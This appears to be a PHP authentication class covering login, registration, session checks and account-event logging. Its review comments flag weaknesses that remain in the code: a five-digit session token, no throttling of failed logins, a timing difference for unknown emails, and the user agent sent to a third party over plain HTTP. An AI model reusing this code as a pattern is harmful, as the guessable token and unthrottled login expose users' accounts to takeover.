- application/x-httpd-php UserAuth.class.php ( PHP script text )
- <?php
- namespace App;
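/**
 * Session-backed authentication against the `users` table.
 *
 * Relies on the parent class to provide `$this->mysql`; the calls made on it
 * (prepare/execute/fetchColumn/lastInsertId) match the PDO API - confirm
 * against the MySQL base class. Every public method reads or writes
 * $_SESSION, so the caller is expected to have started the session already.
 */
class UserAuth extends MySQL
{
    /**
     * Check that the current PHP session still matches the token stored for its user.
     *
     * @return bool true only when both session values exist and exactly one row matches
     */
    public function loggedin()
    {
        // A visitor who never logged in has neither key; answer without
        // raising undefined-index notices or querying the database.
        if (!isset($_SESSION['userid'], $_SESSION['session'])) {
            return false;
        }

        $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE id = ? AND session = ?');
        $selectSql->execute([$_SESSION['userid'], $_SESSION['session']]);

        return (int) $selectSql->fetchColumn() === 1;
    }

    /**
     * Verify an email/password pair and bind the account to the current session.
     *
     * @param string $email    address to look up (rejected when longer than 32 bytes)
     * @param string $password clear-text password, checked with password_verify()
     *
     * @return string the literal string 'true' on success, otherwise a user-facing error message
     */
    public function login($email, $password)
    {
        // One message for every credential failure, so the response text does
        // not reveal whether the email exists.
        $genericError = 'The email/password combination is incorrect.';

        // Request parameters can arrive as arrays (e.g. email[]=x); reject
        // anything that is not a string before it reaches strlen()/password_verify().
        if (!is_string($email) || !is_string($password) || strlen($email) > 32) {
            return $genericError;
        }

        $selectSql = $this->mysql->prepare('SELECT * FROM users WHERE email = ?');
        $selectSql->execute([$email]);
        $rows = $selectSql->fetchAll();
        if (empty($rows)) {
            // NOTE(review): no password_verify() runs on this path, so an
            // unknown email is answered faster than a wrong password; verify
            // against a fixed dummy hash here if that timing difference matters.
            return $genericError;
        }

        $account = (object) $rows[0];
        if (!password_verify($password, $account->password)) {
            // NOTE(review): failures are recorded but nothing here throttles
            // repeated attempts - confirm rate limiting exists elsewhere.
            $this->log($account->id, 'Failed Log In');
            return $genericError;
        }

        // The ban message is shown only after the password was verified.
        if ((int) $account->banned === 1) {
            return 'Your account has been banned from our system.';
        }

        $this->log($account->id, 'Logged In');

        // Issue a fresh session id at the privilege change so an id that was
        // planted or observed before login cannot be reused (session fixation).
        if (session_status() === PHP_SESSION_ACTIVE) {
            session_regenerate_id(true);
        }

        // Same numeric range as before, so the value still fits the existing
        // `session` column, but drawn from the CSPRNG instead of mt_rand().
        // NOTE(review): five digits is a small space; widen it (for example
        // bin2hex(random_bytes(32))) once the column type is confirmed to hold it.
        $sessionid = random_int(11111, 99999);
        $_SESSION['userid'] = $account->id;
        $_SESSION['session'] = $sessionid;

        $updateSql = $this->mysql->prepare('UPDATE users SET session = ? WHERE id = ?');
        $updateSql->execute([$sessionid, $account->id]);

        return 'true';
    }

    /**
     * Create a new account.
     *
     * @param string $email     address for the new account (at most 32 bytes)
     * @param string $password  clear-text password; only its password_hash() output is stored
     * @param string $password2 repeated password, must be identical to $password
     *
     * @return string the literal string 'true' on success, otherwise a user-facing error message
     */
    public function register($email, $password, $password2)
    {
        if (!is_string($email) || strlen($email) > 32) {
            return 'Your email has to be 32 or less characters long.';
        }

        // Compare the passwords themselves with a strict operator. A loose
        // comparison of two md5() hex digests treats digests of the form
        // "0e<digits>" as equal numbers, so different passwords could "match".
        if (!is_string($password) || empty($password) || $password !== $password2) {
            return 'Your repeated password needs to match the password';
        }

        // Credentials are never written to disk or logs in clear text; the
        // only persisted form of the password is the hash inserted below.

        $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE email = ?');
        $selectSql->execute([$email]);
        if ((int) $selectSql->fetchColumn(0) > 0) {
            return 'This email is already taken';
        }

        // NOTE(review): check-then-insert is not atomic; a UNIQUE index on
        // users.email is needed to rule out duplicates - confirm the schema.
        // Positional insert: the hash is bound before the email, so this
        // depends on the column order of `users` - confirm, or name the columns.
        $insertSql = $this->mysql->prepare('INSERT INTO users VALUES (null, ?, ?, 0, 0)');
        $insertSql->execute([password_hash($password, PASSWORD_DEFAULT), $email]);
        $this->log($this->mysql->lastInsertId(), 'Signed Up');

        return 'true';
    }

    /**
     * Record an account event in `acclogs` with client address and user-agent details.
     *
     * @param mixed  $userId   id of the account the event belongs to
     * @param string $activity short event label such as 'Logged In'
     * @param string $status   status value stored with the entry
     *
     * @return bool always true
     */
    private function log($userId, $activity, $status = '0')
    {
        $userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? (string) $_SERVER['HTTP_USER_AGENT'] : '';
        $agentName = null;
        $osName = null;

        if ($userAgent !== '') {
            // This lookup runs inside every login and sign-up; bound it with a
            // timeout so a slow or unreachable service cannot stall authentication.
            // NOTE(review): the request is plain HTTP to a third party and sends
            // the visitor's user agent off-site; parsing the header locally
            // would remove this dependency from the login path.
            $context = stream_context_create(['http' => ['timeout' => 2]]);
            $response = file_get_contents(
                'http://www.useragentstring.com/?uas=' . urlencode($userAgent) . '&getJSON=all',
                false,
                $context
            );

            // The response is untrusted: keep only the two scalar fields that
            // are stored, and fall back to null when it is missing or malformed.
            $browser = ($response === false) ? null : json_decode($response);
            if (is_object($browser)) {
                if (isset($browser->agent_name) && is_scalar($browser->agent_name)) {
                    $agentName = (string) $browser->agent_name;
                }
                if (isset($browser->os_name) && is_scalar($browser->os_name)) {
                    $osName = (string) $browser->os_name;
                }
            }
        }

        $insertSql = $this->mysql->prepare('INSERT INTO acclogs VALUES (null, ?, ?, ?, ?, ?, ?, ?)');
        $insertSql->execute([
            $userId,
            $_SERVER['REMOTE_ADDR'] ?? null,
            $agentName,
            $osName,
            $activity,
            $status,
            time(),
        ]);

        return true;
    }
}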